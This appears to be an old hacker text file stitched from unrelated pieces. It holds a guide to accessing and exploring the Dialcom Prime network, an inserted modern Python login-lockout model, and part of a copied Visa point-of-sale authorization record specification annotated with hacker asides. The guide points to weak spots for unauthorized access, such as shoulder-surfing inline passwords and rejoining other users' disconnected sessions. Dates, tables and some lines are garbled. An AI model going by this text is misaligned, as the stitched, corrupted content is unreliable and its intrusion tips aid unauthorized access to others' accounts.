Please, Universities ONLY...this is a list to assist students.]


by
Herd Beast
(hbeast@phantom.com)


Introduction 


Dialcom is an interesting system for hackers for two reasons:
First, it is used by business people, reporters and many others world
wide, and it offers a variety of information services, from a
bulletin board to stock market updates and news services. Second,
Dialcom runs on Prime machines, so using Dialcom is a good way to
learn Prime. True, it’s not the best, as access is generally restricted,
but it’s better than, say, learning VMS from Information America.


In these days, where everyone seems to be so centered about the
Internet and the latest Unix holes, it’s important to remember that the
information super-highway is not quite here, and many interesting things
are out there and not on the Internet. Phrack has always been a good place
to find out more about these things and places, and I wrote this article
after reading the Dialog articles in Phrack.


Well, gentle reader, I guess that my meaning-of-life crap quota is full, 
so let’s move on. 


Accessing Dialcom and Logging In 


Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet, 
and other networks as well as dialin modems. Since I am not writing to 
Washington people only, I will specify only the easiest methods -- Tymnet 
and Sprintnet -- and some of the more interesting access methods. 


Dialcom is basically a Primecom network. Each user has an account on
one or more of the systems connected to that network. To access Dialcom,
the user needs to access the machine his account is on. First, he logs
into a public data network and follows the steps required to connect to
a remote node. On Tymnet, this means getting to the "please log in:"
prompt, and on Sprintnet it’s the famous ’@’ prompt.


For Tymnet, you must enter at the prompt: DIALCOM;<system number> 
(eg, DIALCOM;57). The same goes for TYMUSA connection from outside 
the USA. 


For Sprintnet or other PADs, you must enter the correct NUA: 


System #      Sprintnet NUA      Tymnet NUA
XX            3110 301003XX      3106 004551XX
(32, 34,
AL: MG,
50, 52,
aby “Ose s
63, 64)


It should be noted that Dialcom keeps its own X.25 network, Dialnet,
and the NUAs on it are those of the systems (connect to address "57"
for system 57).


Dialcom has other access methods, meant to be used from outside the 
USA, but sometimes available from within as well. 


One is a COMCO card, which is inserted into a reader connected to the 
computer and the modem through a serial link. The user then calls a 
special dial-up number, and can connect to Dialcom (or any other NUA). 

The card contains a number of "tax units" which are deducted as the 
connection goes through, until they are exhausted and the card is useless. 
The user calls the dial-up and types in ".<CR>". The amount of tax units 
on the card will then appear on the screen, and the user can connect to a 
host. COMCO dial-ups: 


Location Number 
Australia +61-02-2813511 
Belgium +32-02-5141710 
France +33-1-40264075 
West Germany +49-069-290255 
Hong Kong +852-5-8611655 
Netherlands +31-020-6624661 
Switzerland +41-022-865507 
United Kingdom +45-01-4077077 
USA (Toll Free) +1-800-777-4445 
USA +1-212-747-9051 

The other way is through Infonet. I will not turn this into an Infonet
guide, save to write the logon sequence needed to access Dialcom.
At the ’#’ prompt, enter ’C’. At the "Center:" prompt, enter "DC".
Dialcom NUAs are 31370093060XX, where XX is the system number.


Once the connection to a Dialcom system has been established, you will 
be greeted by the Prime header: 


Primecom Network 19.4Q0Q.111 System 666 


Please Sign On 
> 


And the ’>’ prompt. This is a limited prompt as most commands cannot 
be issued at it, so you need to login. 


Dialcom user id’s are typically 3 alphabetic characters followed by 
several digits. The password may contain any character except for 
",;/*" or spaces, and my experience shows that they tend to be of 
intermediate complexity (most will not be found in a dictionary, but 
could be cracked). 


Password security may become useless at this point, because the Dialcom 
Prime systems allow ID to take both user id and password as arguments 
(which some other Primes do not) and in fact, Dialcom tutorials tell 
users to log on like this -- 


>ID HBT007 IMEL8


-- which makes ‘‘shoulder surfing’’ easier.

Once you log on, you will see:

Dialcom Computer Services 19.40Q.111(666) 


On At 14:44 07/32/94 EDT 
Last On At 4:09 06/44/94 EDT 


=] 


> 


And again, the ’>’ prompt. 
>off
Off At 14:45 07/32/94 EDT
Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.


Security at Dialcom 


As mentioned, while passwords are relatively secure, the manner in
which they are entered is usually not.


As for the accounts themselves, it’s important to understand the
general way accounts exist on Dialcom. Dialcom users are usually
part of a business that has an ‘‘account group’’ on Dialcom. Each
user gets an account from that group (HBT027, HBT054). Each group
also has a group administrator, who controls what each account can
access. The administrator determines which programs (provided by Dialcom)
each user can access. A foreign correspondent for a magazine might
have access to the news services while other users might not. The
administrator also determines how much the user can interface with
the Prime OS itself. Each user can run a few basic commands (list
files, delete, sign off) but above that, it’s up to the administrator.
The administrator may opt to remove a user from the controlling menuing
system -- in which case, the user has no restrictions forced upon him.


Group administrators, however, handle only their groups, and not the 
Dialcom system. They need, for example, to notify Dialcom staff if 
they want an account removed from the system. 


Another (different yet combined) part of the account/group security
are accounts’ ‘‘security levels’’ (seclevs). Seclevs range from 3
to 7, and determine the access an account has to various places.
Seclev 4 users, for example, are not restricted to seeing only users
of their group on the system, and can delete accounts from the menuing
system.


User accounts own their directories and files within (but high seclevs
can read other users’ files). Each account’s security is left in some
extent to its owner, in that the user sets his own password. When
setting a password, a user can set a secondary password. Any user wishing
to access that user’s directory will need that password. Furthermore,
the user can allow other users to attach as owners to his directory if
they know his password (come to think of it, couldn’t they just login
as him?). This is all controlled by the PASSWD program (see ‘‘Common
Commands’’, below).


Dialcom also allows for login attempt security using the NET_LOCK
program. NET_LOCK blocks login attempts from addresses that have
registered too many login failures over a period of time (the default
being blocking for 10 minutes of addresses that have registered more
than 10 failed logins within 5 minutes). NET_LOCK -DISPLAY is accessible
to users of Seclev 5 and shows addresses currently blocked and general
information. Other options are accessible to Seclev 7 and are:
-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
an address), -LOCK_PERIOD (the period in which these attempts must
occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
lockout feature is disabled).
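
The NET_LOCK defaults described above, modelled as an added example (not Dialcom's code; the class, function and address names are hypothetical): a per-address sliding window that locks on the 11th failure inside 5 minutes and releases 10 minutes later. The event list is constructed, and the -WINDOW option is not modelled.

```python
from collections import defaultdict, deque


class LoginLockout:
    """Per-address lockout: more than `attempts` failures within
    `lock_period` seconds blocks the address for `lock_time` seconds."""

    def __init__(self, attempts=10, lock_period=300, lock_time=600):
        self.attempts = attempts
        self.lock_period = lock_period
        self.lock_time = lock_time
        self.failures = defaultdict(deque)   # address -> failure timestamps
        self.locked_until = {}               # address -> release timestamp

    def is_locked(self, addr, now):
        until = self.locked_until.get(addr)
        if until is None:
            return False
        if now >= until:                     # lock expired, forget it
            del self.locked_until[addr]
            return False
        return True

    def record_failure(self, addr, now):
        """Register one failed login; return True if addr is locked after it."""
        if self.is_locked(addr, now):
            return True
        window = self.failures[addr]
        window.append(now)
        while window and now - window[0] > self.lock_period:
            window.popleft()                 # failure fell out of the period
        if len(window) > self.attempts:
            self.locked_until[addr] = now + self.lock_time
            window.clear()
            return True
        return False


def replay(events, policy):
    """Run (timestamp, address, success) events through the policy.
    Returns ([(time, address) of each new lock], attempts refused while locked)."""
    new_locks, refused = [], 0
    for ts, addr, ok in events:
        if policy.is_locked(addr, ts):
            refused += 1
            continue
        if not ok and policy.record_failure(addr, ts):
            new_locks.append((ts, addr))
    return new_locks, refused


# Constructed events: one address failing every 10 s, one user mistyping twice.
BURST_ADDR = "addr-A"
USER_ADDR = "addr-B"
SAMPLE_EVENTS = sorted(
    [(t, BURST_ADDR, False) for t in range(0, 160, 10)]
    + [(700, BURST_ADDR, True)]
    + [(0, USER_ADDR, False), (400, USER_ADDR, False), (800, USER_ADDR, True)]
)

if __name__ == "__main__":
    locks, refused = replay(SAMPLE_EVENTS, LoginLockout())
    print("locks:", locks, "refused while locked:", refused)
```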


A little unrelated is the network reconnect feature of the Prime
computers. When a user gets disconnected from the system because
of a network failure, or for any other reason which is not the
system’s fault, he can log back in and reconnect into the disconnected
job. When this happens, the user sees, upon logging on:


You Have a Disconnected Job: 


HBT007 dog 1» 109 NT NETLINK 989898989 or. 3


Do You Want to Reconnect?


Which means user’s HBT007 job #9 (a NETLINK command) is waiting for
a reconnection. At this point, the user can continue, leaving the
job to hang until the system signs it off when a certain amount of
time expires; sign the job off himself; or reconnect to that job.
(Try "HELP" at the prompt.) This wouldn’t be important, but experience
shows that many disconnections occur when someone logs into Dialcom
over a network, and then uses NETLINK (or another program) to connect
to another site over a network, and somewhere, some time, he issues
a control sequence (let’s say to tell NETLINK to do something) that
gets processed by the first network, which logs him off. So there
is potential to log into the middle of people’s sessions (yeah, like
detached ttys).


Common Commands


Common commands are in reality the basic Prime commands that every
account has access to. Here they are, in alphabetical order.


‘CLEAR’ Clear the screen.

‘DATE’ Shows the date at which a command was entered. Output:

>DATE
Proceed to next command

>BAH

Friday, June 38, 1994 10:01:00 AM

‘DEL’ Deletes a file.

‘DELP’ Deletes several files based on wildcards. Can verify deletion
of every file, and delete only files modified before, after, or
between certain dates.

‘ED’ Is the default and simplest file editor on Dialcom (some of its
brothers are JED and FED). Once invoked, ED enters INPUT mode,
in which the user just types text. To enter EDIT mode, where
you can issue commands, you need to press <CR> on a blank line
(the same thing will get you from EDIT mode back to INPUT mode).
The EDIT mode uses a pointer to a line. All commands are carried
on the line that the pointer points to. "T" will bring the
pointer to the top of the text, "B" to the bottom, "N" to the
next line down, "U" to the next line up, and "L <word>" to
the line containing <word>.

ED commands include:

P: PRINT the pointer line. P<number> will print <number>
of lines.
C: Change words. The format is "C/old word/new word".
A: Appends words. The format is "A <words>".
R: Retype pointer line. The format is "R <new line>".
SP: Check the spelling of the text, and then point to
the top of the text.
Will save the text and exit ED.
Q: Will quit/abort editing and exit

AES List all file info. Output:

DIALCOM.TXT 001 13/30/94 13:50 ASC DWR

Which means file name "DIALCOM.TXT", size of 1 file blocks,
last modified on 13/30/94 at 13:50, is an ASC type file, and
the account has the permissions to D(elete), W(rite), and
R(ead) it.

‘HELP’     (‘?’) Displays a nicely formatted menu of available commands.

‘INFO’     System info. INFO <info-file-name> displays an information
           file, for example, INFO NETLINK.
           "INFO ?" lists info files.
           "INFO BRIEF" lists info files grouped by application.
           "INFO INFO" lists info files with their descriptions.

‘L’        List all file names. Output:

           <S666-6>HBT007 (Owner)
           DIALCOM.TXT

‘LS’       Display information about available segments and the account’s
           access to them. Output:

           2 Private static segments.
           segment  access

           4000     RWX
           4001     RWX

           11 Private dynamic segments.
           segment  access

           4365     RX
           4366     RX
           4367     RWX
           4370     RWX
           4371     RX
           4372     RWX
           4373     RX
           4374     RWX
           4375     RX
           4376     RX
           4377     RWX

‘NAME’     Changes UFD name. Output:

           >NAME
           Old Name: John Gacy
           UFD Name: Herd Beast
           All done

           >WHO
           Herd Beast <S666-6>HBT007

‘NETWORK’  Accesses a database that contains dial-up number for Sprintnet,
           Tymnet, Datapac and Dialcom’s Dialnet by State/City.

‘OFF’      Sign off the system.

‘ONLINE’   Who’s online? The amount of data displayed depends on the
           account’s seclev. Seclevs below 4 are restricted to seeing
           only users of their group. Output:

           HBT007 PRK017 MJR

‘PAD’      Allows you to send commands to an X.29 PAD, these commands
           being the SET/SET?/PAR? commands and their parameter/value
           pairs.

‘PASSWD’   Change your password. PASSWD has two forms: a short one,
           which just changes the user’s password, and a long form,
           invoked by PASSWD -LONG, which allows the user to set
           a second password for other users accessing his directory,
           and also to determine if they can have owner access to
           the directory.

‘PROTECT’  Protects a file (removes permissions from it).
           "PROTECT DIALCOM.TXT" will remove all three (D, W, R)
           attributes from it. This will result in:

           >DEL DIALCOM.TXT
           Insufficient access rights. DIALCOM.TXT (DEL:10)

           But --

           >DELETE DIALCOM.TXT
           "DIALCOM.TXT" protected, ok to force delete? y

‘SECLEV’   Your security level. Output:

           Seclev=5

‘SIZE’     Size information about a file. Output:

           1 Block, 404 Words

‘STORAGE’  Shows storage information.

‘SY’       Show users on system. (Same restrictions as for ONLINE apply.)
           Will show user name, time on, idle time, devices used, current
           jobs and state, etc. Output:

           41 Users on sys 666

           Names use idle mem State command object devs
           HBT007 zs O. 155 R1 oy. 6 3 from Tymnet via X.25

‘SYS’      Displays account information and system number. Output:

           <S666-6>HBT007 on system 666.

‘TERM’     Used to tell the Dialcom computer what terminal the user is
           using. A list of supported terminals is generated by "TERM
           TERMINALS". TERM options are:

           TYPE <terminal type>   (TYPE VT100)
           WIDTH <width>          (Terminal width, if different
                                  than default)
           TOP                    (Start listings at top of screen)
           PAUSE                  (Pause listings when screen is
                                  full)
           -ERASE, -KILL <char>   (Sets the erase or kill character)
           -BREAK <ON|OFF>        (Enables or disables BREAKs)
           -HALF or -FULL         (Half duplex or full duplex)
           -DISPLAY               (Output current terminal information)

‘WHO’      Displays account information. Output:

           <S666-6>HBT007

           Which means user HBT007 on system 666 on device 6.


Communicating on Dialcom 
Users who want to communicate on Dialcom have two choices, basically.
These are the Dialcom bulletin board and electronic mail. The Dialcom
bulletin board has two versions. The first consists of several message
bases (called ‘‘categories’’) which are shared between some Dialcom
systems (and mostly used by bored employees, it seems); there are also
private bulletin boards, which are not shared between the systems. They
belong to account groups, and only users in an account group can access
that group’s bulletin board system. These versions of the Dialcom board
are often empty (they have no categories defined and hence are unusable).


This is accessed by the command POST (PRPOST for the private board). 
Once POST is activated, it will display a prompt: 


Send, Read or Purge: 


If the answer is READ, POST will ask for a category (a list of categories
will be displayed if you type HELP at that prompt). Once a category
has been joined, you will be able to read through the messages there:


Subject: ?
From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666


Continue to Next Item? 


Answering SEND at the first prompt will allow you to send a message in a 
category. 


Answering PURGE will allow you to delete messages posted by your account.
When you enter PURGE and the category to purge messages from, the system
will show you any posts that you are allowed to purge, followed by a
"Disposition:" prompt. Enter DELETE to delete the message.


The second way to communicate is the Dialcom MAIL system. MAIL allows 
sending and receiving messages, it allows for mailing lists, filing 
mail into categories, holding mail to read later and so on. MAIL is 
invoked by entering, uh... oh, yes, MAIL. 


It works along similar lines to those of POST, and will display the following 
prompt: 


Send, Read or Scan: 


SEND: Allows you to send a message. It will prompt with "To:", 
"Subject:" and "Text:" (where you enter the actual message, followed 
by ".SEND" on a blank line to end). After a message is sent, the 
"To:" prompt will appear again -- use "QUIT" to leave it. 


A word about the "To:" prompt. There are two configuration files which
make its use easier. First the MAIL.REF file, which is really a mailing
list file. It contains entries in the format of --


<Nick> <Accounts>
DOODZ DVR014 ABCO013 XYZ053


-- and at the "To:" prompt, you can just enter "DOODZ" and the message
will be sent to all three accounts. When you enter a name, MAIL searches
through your MAIL.REF, and then through the account administrator’s, and
only then parses it as an account name. Second is the mail directory,
which contains the names and account IDs of many users the account is
in contact with. To display it, type "DIS DIR" at the first prompt.
You’ll get something like this:


HERD-BEAST 6666:HBT007 WE’RE BAD AND WE’RE KRAD


Which means you can type "HERD-BEAST" at the prompt, and not just
HBT007. Also, there are special options for the "To:" prompt, most
notable are: CC to send a carbon copy; EX to send the message with
‘‘express priority’’; DAR to request that if the message is sent
to a user on another Dialcom system, POSTMASTER will send you a
message verifying that your message has been sent; and NOSHOW,
to keep the receiver from seeing everybody else on the "To:" list.


For example (all these people are in the mail directory), 


To: DUNKIN D.DREW CC FOLEY NOSHOW EX 


You enter the message about to be sent at the "Text:" prompt. That 
mode accepts several commands (like .SEND), all of which begin with a 
dot. Any command available at the "To:" prompt is available here. 


For example, you can add or remove names from the "To:" field using
".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
You also have a display command, ".DIS". ".DIS" alone shows the text
entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
the entire header; etc. Finally, you have editing options. ".ED" will
load editing mode, so you can change the text you entered. ".LOAD
<filename>" will load <filename> into the text of the message. ".SP"
will check the spelling of text in the message, and there are other
commands.


READ: Allows you to read mail in your mailbox. Once you enter READ,
MAIL will display the header of the first message in your mailbox
(or "No mail at this time") followed by a "--More--" prompt. To
read the message, press <CR>; otherwise, enter NO. After you are done
reading a message, you will be prompted with the "Disposition:" prompt,
where you must determine what to do with the message. There you can enter
several commands: AGAIN to read the message again; AG HE to read the
header again; AP REPLY to reply to the message and append the original
message to the reply; AP FO to forward the message to someone and add
your comments to it; REPLY to reply to the sender of the message; REPLY
ALL to reply to everybody on the "To:" field; FILE to file the message;
SA to save the message into a text file; NEXT to read the next message
in your mailbox; and D to delete the message.


SCAN: Allows you to see a summary of the messages in the mailbox. Both
READ and SCAN have options that allow you to filter the messages you
want to read: FR <ids> to get only messages from <ids>; TO <ids> to
get only messages sent to <ids>; ‘string’ to get only messages containing
‘‘string’’ in the "Subject:" field; "string" to get only messages
containing ‘‘string’’ in the message itself; FILE CATEGORY to get only
messages filed into ‘‘CATEGORY’’; and DA Month/Day/Year to get only messages
on that date (adding a ’-’ before or after the date will get you everything
before or after that date, and it’s also possible to specify two dates
separated by a ’-’ to get everything between those dates). For example,
to get all of Al Gore’s messages about Clipper before August 13th:


READ FILE CLIPPER FR GOR ’Great stuff’ DA -8/13/94 


There is also a QS (QuickScan) command that behaves the same as SCAN,
only SCAN shows the entire header, and QS just shows the "From:" field.


However, there is more to do here than just send, read or scan.
Some of it was mentioned when explaining these commands. Both sent
and received messages can be saved into a plain text file or into
a special mailbox file, called MAIL.FILE. Messages filed into the
MAIL.FILE can be grouped into categories in that file.


SAVING MESSAGES: Messages are saved by entering "SA filename" at a
prompt. For a sent message, it’s the "Text:" prompt, while entering the
message, and the command is ".SA", not "SA". For a received message, it’s
either the "--More--" or the "Disposition:" prompt.


FILING MESSAGES: Messages are filed in two cases. First, the user
can file any message into any directory, and second, the system files
read messages that lay in the mailbox for over 30 days. Received messages
are filed by entering "FILE" at the "Disposition:" prompt. This files
the message into a miscellaneous category called BOX. If an optional
<category-name> is added after "FILE", the message will be filed into
that category. If <category-name> doesn’t exist, MAIL can create it
for you. After a message has been filed, it’s not removed from the
mailbox -- that’s up to the user to do. Sent messages behave the same
way, but the command is ".FILE" from the "Text:" prompt.


To display categories of filed mail, enter DIS FILES at a prompt. To
read or scan filed messages, just add "FILE <category-name>" after
the command (READ, SCAN, etc). To delete a category, enter D FILE
<category-name>. To delete a single message in a category, just use
D as you would on any other message, after you read it from the
MAIL.FILE.


Connecting via Dialcom 


Dialcom allows its customers to access other systems through it.
There are some services offered specifically through Dialcom, such as
the BRS/MENUS service, which is an electronic library with databases
about many subjects, Telebase’s Cyclopean Gateway Service, which offers
access to many online database services (like Newsnet, Dialog and even BRS)
and more. These services have a direct connection to Dialcom and software
that maps Dialcom user ids to their own ids (it’s not usually possible for
someone to access one of these services without first connecting to Dialcom).


Another method is general connection to X.25 addresses. Since Dialcom 
is connected to X.25, and it allows users to use the Prime NETLINK 
commands, it’s possible to PAD out of Dialcom!!#! 


NETLINK is invoked by entering NETLINK. NETLINK then displays its own, 
'@’ prompt. The commands available there are QUIT, to quit back to 
the OS; CONTINUE, to return to an open connection; CALL, to call an 
address; and D, to disconnect an open connection. 


CALL takes addresses in several formats. A system name, to connect to 
a Dialcom system, or an address in the format of DNIC:NUA. For example, 


@ CALL :666 
Circuit #1 
666 Connected 
Dexess, |] 


@ CALL 3110:21300023 
Circuit #2 

21300023 Connected 
[ames] 

NETLINK establishes connections in the form of circuits. A circuit can
be broken out of into command mode (the ’@’ prompt), using "<CR>@<CR>",
and another can be opened, or parameters can be changed, etc.

NETLINK has other commands, to log connections into a file, or set PAD
parameters (SET, PAR), or turn on connection debugging, or change
the default ’@’ prompt, and more.


Things to Do on Dialcom 


Much of what Dialcom offers was not covered until now and will not
be covered. That’s because most of the services could use a file each,
and because many account groups have things enabled or disabled
just for them. Instead, I will write shortly about two of the more
interesting things online, the news service and clipping service,
and add pointers to some interesting commands to try out.


The news service, accessed with the NEWS command, is a database of
newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
The user enters the database, and can search for news by keywords.


After entering NEWS, you will see a menu of all the news agencies.
Once you choose an agency, you will enter its menu, which sometimes
contains a copyright warning and terms of usage and also the list
of news categories available from that agency (National, North America,
Business, Sports, etc). Once you choose the category, you will be
asked for the keyword to search for. If a story (or several stories) was
found containing your desired keyword, you can read through the
stories in the order of time, or the order they appear, or reverse
order and so on, and finally mail a story to yourself, or enter new
search keywords, or jump to another story, or simply quit.


The news clipping service, available with the command NEWSTAB, allows
the user to define keyword-based rules for selecting news clippings.
The system then checks every newswire that passes through it, and if
it matches the rules, mails the newswire to the user.


After entering NEWSTAB, you are presented with a menu that allows you
to show, add, delete, and alter your rules for choosing news. The rules
are made using words or phrases, logical operators, wildcards and
minimal punctuation. A rule can be as simple as "HACKING", which will
get every newswire with the word "hacking" in it mailed to you, or
if you want to be more selective, "NASA HACKING". Logical operators
are either AND or OR. For example, "HACKING AND INTERNET". Wildcards
are either ’*’ or ’?’ (both function the same). They simply replace
any number of letters. Punctuation is permitted for initials,
abbreviations, apostrophes or hyphens, but not for question marks and
similar. All of this is explained in the NEWSTAB service itself.


For the file hungry, Dialcom offers several file transfer programs, 
including KERMIT and Dialcom’s FT, which implements most popular 
protocols, like Zmodem, Xmodem, etc. 


A small number of other fun things to try: 


NET-TALK   The ‘‘interactive computer conferencing system’’ -- build
           your private IRC!

CRYPTO     Dialcom’s encryption program. Something they’re probably
           going to love on sci.crypt.

NUSAGE     By far one of the better things to do on Dialcom, it was
           left out of this file because it is simply huge. This
           program allows the user (typically an administrator) to
           monitor network usage, sort the data, store it, peek
           into all the little details (virtual connection types,
           remote/local addresses, actions, time, commands, etc).
           Unfortunately, it’s completely beyond the scope of this
           file, as there are tons of switches and options to use
           in order to put this program to effective use.
EXTERNAL INTERFACE SPECIFICATION


SECOND GENERATION 
AUTHORIZATION RECORD FORMATS 


For Record Formats 


J - PS/2000 REPS 
G - VisaNet Dial Debit 


1.0 INTRODUCTION 
2.0 APPLICABLE DOCUMENTS 
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 
3.0 AUTHORIZATION RECORD FORMATS 
3.01 REQUEST RECORD FORMAT
3.02 RESPONSE RECORD FORMAT
4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
4.01 RECORD FORMAT
4.02 APPLICATION TYPE
4.03 MESSAGE DELIMITER
4.04 ACQUIRER BIN
4.05 MERCHANT NUMBER
4.06 STORE NUMBER
4.07 TERMINAL NUMBER
4.08 MERCHANT CATEGORY CODE
4.09 MERCHANT COUNTRY CODE
4.10 MERCHANT CITY CODE
4.11 TIME ZONE DIFFERENTIAL
4.12 AUTHORIZATION TRANSACTION CODE 
4.13 TERMINAL IDENTIFICATION NUMBER 
4.14 PAYMENT SERVICE INDICATOR 
4.15 TRANSACTION SEQUENCE NUMBER 
4.16 CARDHOLDER IDENTIFICATION DATA 
4.17 ACCOUNT DATA SOURCE 
4.18 CUSTOMER DATA FIELD 
4.18.1 TRACK 1 READ DATA 
4.18.2 TRACK 2 READ DATA 
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 
4.18.4.1 CHECK ACCEPTANCE ID 
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA 
4.19 FIELD SEPARATOR 
4.20 CARDHOLDER IDENTIFICATION DATA 
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID 
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID 
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm... ] 
4.21 FIELD SEPARATOR 
4.22 TRANSACTION AMOUNT 
4.23 FIELD SEPARATOR 
4.24 DEVICE CODE/INDUSTRY CODE 
4.25 FIELD SEPARATOR 
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 
4.27 FIELD SEPARATOR 
4.28 SECONDARY AMOUNT (CASHBACK) 
4.29 FIELD SEPARATOR 
4.30 MERCHANT NAME 
4.31 MERCHANT CITY 
4.32 MERCHANT STATE 
4.33 SHARING GROUP 
4.34 FIELD SEPARATOR 
4.35 MERCHANT ABA NUMBER 
4.36 MERCHANT SETTLEMENT AGENT NUMBER 
4.37 FIELD SEPARATOR 
4.38 AGENT NUMBER 
4.39 CHAIN NUMBER 
4.40 BATCH NUMBER 
4.41 REIMBURSEMENT ATTRIBUTE 
4.42 FIELD SEPARATOR 
4.43 APPROVAL CODE 
4.44 SETTLEMENT DATE 
4.45 LOCAL TRANSACTION DATE 
4.46 LOCAL TRANSACTION TIME 
4.47 SYSTEM TRACE AUDIT NUMBER 
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE 
4.49 NETWORK IDENTIFICATION CODE 
4.50 FIELD SEPARATOR 
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 
5.01 PAYMENT SERVICE INDICATOR 
5.02 STORE NUMBER 
5.03 TERMINAL NUMBER 
5.04 AUTHORIZATION SOURCE CODE 
5.05 TRANSACTION SEQUENCE NUMBER 
5.06 RESPONSE CODE 
5.07 APPROVAL CODE 
5.08 LOCAL TRANSACTION DATE 
5.09 AUTHORIZATION RESPONSE CODE 
5.10 AVS RESULT CODE 
5.11 TRANSACTION IDENTIFIER 
5.12 FIELD SEPARATOR 
5.13 VALIDATION CODE 
5.14 FIELD SEPARATOR 


5.15 NETWORK IDENTIFICATION CODE
5.16 SETTLEMENT DATE
5.17 SYSTEM TRACE AUDIT NUMBER
5.18 RETRIEVAL REFERENCE NUMBER
5.19 LOCAL TRANSACTION TIME
6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
6.01 NETWORK IDENTIFICATION CODE
6.02 SETTLEMENT DATE
6.03 SYSTEM TRACE AUDIT NUMBER

7.0 CHARACTER CODE DEFINITIONS 


7.01 TRACK 1 CHARACTER DEFINITION 
7.02 TRACK 2 CHARACTER DEFINITION 
7.03 AUTHORIZATION MESSAGE CHARACTER SET 
7.04 CHARACTER CONVERSION SUMMARY 
7.05 ACCOUNT DATA LUHN CHECK 
7.06 CALCULATING AN LRC 
7.07 TEST DATA FOR RECORD FORMAT "J" 
7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 


7.07.2 RESPONSE MESSAGE FOR TEST DATA 


1.0 INTRODUCTION 


This document describes the request and response record formats for the VisaNet 
second generation Point-Of-Sale (POS) authorization terminals and VisaNet 
Authorization services. This document describes only record formats. Other 
documents describe communication protocols and POS equipment processing 
requirements. Figure 1.0 represents the authorization request which is 
transmitted to VisaNet using public communication services and the 
authorization response returned by VisaNet. Debit transactions include a
third confirmation message.


    POS DEVICE                                      VISANET

    AUTHORIZATION REQUEST         ---->   TRANSMITTED TO A VISANET
                                          HOST SYSTEM

    AUTHORIZATION RESPONSE        <----   RETURNED BY THE VISANET HOST
                                          TO THE POS TERMINAL

    DEBIT RESPONSE CONFIRMATION   ---->   TRANSMITTED TO HOST SYSTEM

                         FIGURE 1.0
                Authorization request and response.


This document describes the record formats to be used for the development of
new applications. Current formats or transition formats will be provided on
request. The usage of some fields has changed with the new record formats.
Applications which were developed to previous specifications will continue to
be supported by VisaNet services. The new formats and field usage are provided
with the intention of moving all new applications developed to the new formats.


2.0 APPLICABLE DOCUMENTS 


The following documents provide additional definitions and background. 


2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 
1. EIS1051 - External Interface Specification
Second Generation 
Authorization Link Level Protocol 


2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE


1. EIS1081 - External Interface Specification 
Second Generation 
Data Capture Record Formats 


2. EIS1052 - External Interface Specification 
Second Generation 
Data Capture Link Level Protocol 


3.0 AUTHORIZATION RECORD FORMATS 


This section contains the record formats for the authorization request, 
response and confirmation records. The ANSI X3.4 character set is used to 
represent all record data elements. (See Section 7) 


In the record formats on the following pages, the column heading FORMAT is 
defined as: 


"NUM" represents numeric data, the numbers 0 through 9, NO SPACES.

"A/N" represents alphanumeric data, the printing character set.

"FS" represents a field separator character as defined in ANSI X3.4 as
a "1C" hex.

3.01 REQUEST RECORD FORMAT 


Table 3.01b provides the record format for the authorization request records. 
Section 4 provides the data element definitions. 


The authorization request record is a variable length record. The record
length will depend on the source of the customer data and the type of
authorization request. Refer to Table 3.01c to determine which GROUPS to use
from Table 3.01a.


TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS
SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:

RECORD | APPLICATION |
FORMAT | TYPE        | REMARKS
J      | CREDIT      | All non-ATM card transactions (Visa cards, other credit
       |             | cards, private label credit cards and check guarantee)
G      | DIAL DEBIT  | Visa supported ATM debit cards


The selection of format type J and G or any other value from Table 3.01a will
depend on the VisaNet services that are desired. Contact your Visa POS member
support representative for assistance in determining the required formats.


TABLE 3.01a
Record Format Summary 


Non-CVV CVV Terminal 
Compliant Compliant Generation Description 
0 RESERVED 
i N First Vutran 
2 8 First Sweda 
4 R First Verifone 
6 P First Amex 
7 3 First Racal 
A Q First DMC 
B R First GTE & Omron [velly intelestink] 
Cc 9 First Taltek 
iS) U First Datatrol - Standard Oil
D T First Datatrol 
E RESERVED 
iS) EF Second Non-REPS-Phase 1 CVV 
G Second Dial Debit 
H Second Non-REPS-Phase 2 CVV 
aE Second RESERVED — Non-REPS Controller 
J Second REPS — Terminal & Controller 
K Second RESERVED 
L Second RESERVED — Leased VAP 
M Second RESERVED — Member Format 
N-O RESERVED 
V-Y RESERVED 
Z Second RESERVED —- SDLC Direct [hmmm] 

TABLE 3.01b

Second Generation Authorization Request Record Format

                                                                     see
Group Byte#    Length Format Name                                    section
      1        1      A/N    Record Format                           4.01
      2        1      A/N    Application Type                        4.02
      3        1      A/N    Message Delimiter                       4.03
      4-9      6      NUM    Acquirer Bin                            4.04
      10-21    12     NUM    Merchant Number                         4.05
      22-25    4      NUM    Store Number                            4.06
      26-29    4      NUM    Terminal Number                         4.07
      30-33    4      NUM    Merchant Category Code                  4.08
      34-36    3      NUM    Merchant Country Code                   4.09
      37-41    5      A/N    Merchant City Code (ZIP in the U.S.)    4.10
      42-44    3      NUM    Time Zone Differential                  4.11
